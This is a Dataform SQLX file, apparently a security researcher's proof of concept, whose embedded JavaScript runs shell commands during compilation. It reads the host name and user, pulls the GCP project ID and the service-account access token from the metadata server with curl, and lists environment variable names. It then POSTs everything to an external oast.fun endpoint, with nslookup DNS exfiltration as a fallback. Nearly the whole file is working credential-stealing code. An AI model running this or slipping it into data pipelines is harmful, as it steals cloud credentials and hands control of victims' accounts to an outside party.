-- Dataform SQLX Exfiltration PoC
-- Uses webhook callback to exfiltrate data to attacker-controlled endpoint
-- Replace ATTACKER_ENDPOINT with your actual endpoint (e.g., webhook.site, requestbin)

config {
  type: "view",
  name: "exfil_poc"
}

js {
  // Exfiltration endpoint
  const EXFIL_URL = 'https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun';

  let exfilData = {
    poc: 'dataform_sqlx_rce',
    timestamp: new Date().toISOString(),
    hostname: 'unknown',
    user: 'unknown',
    gcp_project: 'unknown',
    gcp_token: 'unknown',
    env_keys: []
  };

  try {
    const cp = require('child_process');

    // Gather system info
    try { exfilData.hostname = cp.execSync('hostname').toString().trim(); } catch(e) {}
    try { exfilData.user = cp.execSync('whoami').toString().trim(); } catch(e) {}

    // Gather GCP info
    try {
      exfilData.gcp_project = cp.execSync(
        "curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/project/project-id'"
      ).toString().trim();
    } catch(e) {}

    try {
      exfilData.gcp_token = cp.execSync(
        "curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'"
      ).toString().trim();
    } catch(e) {}

    // Environment variable names
    exfilData.env_keys = Object.keys(process.env);

    // Exfiltrate via HTTP POST
    const payload = JSON.stringify(exfilData);
    const curlCmd = `curl -s -X POST -H 'Content-Type: application/json' -d '${payload.replace(/'/g, "\\'")}' '${EXFIL_URL}'`;
    cp.execSync(curlCmd, {timeout: 10000});

  } catch (e) {
    // If HTTP exfiltration fails, try DNS exfiltration as backup
    try {
      const cp = require('child_process');
      const marker = Buffer.from(exfilData.user + ':' + exfilData.gcp_project).toString('hex').substring(0, 60);
      cp.execSync(`nslookup ${marker}.juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun`, {timeout: 5000});
    } catch(e2) {}
  }
}

SELECT 1 as poc_marker
